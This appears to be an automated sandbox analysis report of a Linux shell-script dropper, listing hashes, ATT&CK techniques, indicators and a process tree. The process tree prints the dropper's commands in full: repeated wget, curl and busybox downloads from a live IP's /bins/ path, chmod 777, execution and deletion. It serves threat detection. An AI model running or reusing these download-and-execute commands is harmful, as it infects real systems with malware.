2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29

General

Target

2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Size

10KB
MD5

abfaa07509a98cf9d61a9ee03366064b
SHA1

29b8aa70ebe761df31582b1b62505f786b247305
SHA256

2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
SHA512

f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
SSDEEP

192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 20 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
845	chmod
869	chmod
734	chmod
755	chmod
801	chmod
820	chmod
839	chmod
786	chmod
863	chmod
690	chmod
720	chmod
857	chmod
831	chmod
851	chmod
875	chmod
674	chmod
684	chmod
705	chmod
767	chmod
773	chmod

Executes dropped EXE 20 IoCs

Processes:

ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqwh2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39pxEVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj11nCDdhzlnSnXajJ21CutBer3j9YONbDPcPq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmchK1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTweqJNBf8c2g1fJM1o23r3J0gI8VptLGhPaE2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDEk7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGotDzQkhNshKptEsPA3ltf516QgABeKEiBY8RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1uSC3qKbILRW2hWzlMHFetryS3VaErrO79PDZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJtDzQkhNshKptEsPA3ltf516QgABeKEiBY8RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1uSC3qKbILRW2hWzlMHFetryS3VaErrO79PDZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJONYgz1i23gINWr7sttSVyPQ1K9qtovRiqwh2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1

Checks CPU configuration 1 TTPs 20 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 40 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlbusyboxK1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTrm

pid process

739 wget
745 curl
752 busybox
757 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
758 rm

pid	process
739	wget
745	curl
752	busybox
757	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
758	rm

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo	curl
File opened for modification	/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	curl
File opened for modification	/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	curl
File opened for modification	/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	curl
File opened for modification	/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	curl
File opened for modification	/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	curl
File opened for modification	/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	curl
File opened for modification	/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	curl
File opened for modification	/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	curl
File opened for modification	/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	curl
File opened for modification	/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	curl
File opened for modification	/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	curl
File opened for modification	/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	curl
File opened for modification	/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	curl
File opened for modification	/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	curl
File opened for modification	/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	curl
File opened for modification	/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	curl
File opened for modification	/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	curl
File opened for modification	/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	curl
File opened for modification	/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	curl

/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
1⤵
PID:644

/bin/rm
/bin/rm bins.sh
2⤵
PID:648

/usr/bin/wget
wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:654

/usr/bin/curl
curl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:671

/bin/chmod
chmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- File and Directory Permissions Modification
PID:674

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Executes dropped EXE
PID:675

/bin/rm
rm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:676

/usr/bin/wget
wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:678

/usr/bin/curl
curl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:683

/bin/chmod
chmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- File and Directory Permissions Modification
PID:684

/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Executes dropped EXE
PID:685

/bin/rm
rm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:686

/usr/bin/wget
wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:687

/usr/bin/curl
curl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:689

/bin/chmod
chmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- File and Directory Permissions Modification
PID:690

/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Executes dropped EXE
PID:691

/bin/rm
rm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:692

/usr/bin/wget
wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:693

/usr/bin/curl
curl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:702

/bin/chmod
chmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- File and Directory Permissions Modification
PID:705

/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Executes dropped EXE
PID:706

/bin/rm
rm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:707

/usr/bin/wget
wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:709

/usr/bin/curl
curl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:717

/bin/chmod
chmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- File and Directory Permissions Modification
PID:720

/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Executes dropped EXE
PID:722

/bin/rm
rm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:723

/usr/bin/wget
wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:724

/usr/bin/curl
curl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:732

/bin/chmod
chmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- File and Directory Permissions Modification
PID:734

/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Executes dropped EXE
PID:736

/bin/rm
rm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:737

/usr/bin/wget
wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:739

/usr/bin/curl
curl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:752

/bin/chmod
chmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- File and Directory Permissions Modification
PID:755

/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:757

/bin/rm
rm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:758

/usr/bin/wget
wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:759

/usr/bin/curl
curl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:766

/bin/chmod
chmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- File and Directory Permissions Modification
PID:767

/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Executes dropped EXE
PID:768

/bin/rm
rm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:769

/usr/bin/wget
wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:770

/usr/bin/curl
curl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:772

/bin/chmod
chmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- File and Directory Permissions Modification
PID:773

/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Executes dropped EXE
PID:774

/bin/rm
rm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:775

/usr/bin/wget
wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:776

/usr/bin/curl
curl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:784

/bin/chmod
chmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- File and Directory Permissions Modification
PID:786

/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Executes dropped EXE
PID:788

/bin/rm
rm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:789

/usr/bin/wget
wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:790

/usr/bin/curl
curl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:798

/bin/chmod
chmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- File and Directory Permissions Modification
PID:801

/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
./tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Executes dropped EXE
PID:802

/bin/rm
rm tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:804

/usr/bin/wget
wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:805

/usr/bin/curl
curl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:817

/bin/chmod
chmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- File and Directory Permissions Modification
PID:820

/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Executes dropped EXE
PID:822

/bin/rm
rm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:823

/usr/bin/wget
wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:824

/usr/bin/curl
curl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:830

/bin/chmod
chmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- File and Directory Permissions Modification
PID:831

/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Executes dropped EXE
PID:833

/bin/rm
rm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:835

/usr/bin/wget
wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:836

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:838

/bin/chmod
chmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- File and Directory Permissions Modification
PID:839

/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Executes dropped EXE
PID:840

/bin/rm
rm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:841

/usr/bin/wget
wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:842

/usr/bin/curl
curl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:844

/bin/chmod
chmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- File and Directory Permissions Modification
PID:845

/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
./tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Executes dropped EXE
PID:846

/bin/rm
rm tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:847

/usr/bin/wget
wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:848

/usr/bin/curl
curl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:850

/bin/chmod
chmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- File and Directory Permissions Modification
PID:851

/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Executes dropped EXE
PID:852

/bin/rm
rm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:853

/usr/bin/wget
wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:854

/usr/bin/curl
curl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:856

/bin/chmod
chmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- File and Directory Permissions Modification
PID:857

/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Executes dropped EXE
PID:858

/bin/rm
rm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:859

/usr/bin/wget
wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:860

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:862

/bin/chmod
chmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- File and Directory Permissions Modification
PID:863

/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Executes dropped EXE
PID:864

/bin/rm
rm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:865

/usr/bin/wget
wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:866

/usr/bin/curl
curl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:868

/bin/chmod
chmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- File and Directory Permissions Modification
PID:869

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Executes dropped EXE
PID:870

/bin/rm
rm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:871

/usr/bin/wget
wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:872

/usr/bin/curl
curl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:874

/bin/chmod
chmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- File and Directory Permissions Modification
PID:875

/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Executes dropped EXE
PID:877

/bin/rm
rm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:878

/usr/bin/wget
wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/770-1-0xb6791000-0xb67a2044-memory.dmp

Download
memory/770-2-0xb675b000-0xb676c044-memory.dmp

Download
memory/842-3-0xb6731000-0xb6742044-memory.dmp

Download
memory/866-4-0xb6735000-0xb6746044-memory.dmp

Download
memory/872-5-0xb671a000-0xb672b044-memory.dmp

Download

ioc	pid	process
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	675	ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	685	h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	691	FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	706	EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	722	11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	736	Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	757	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	768	weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	774	E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
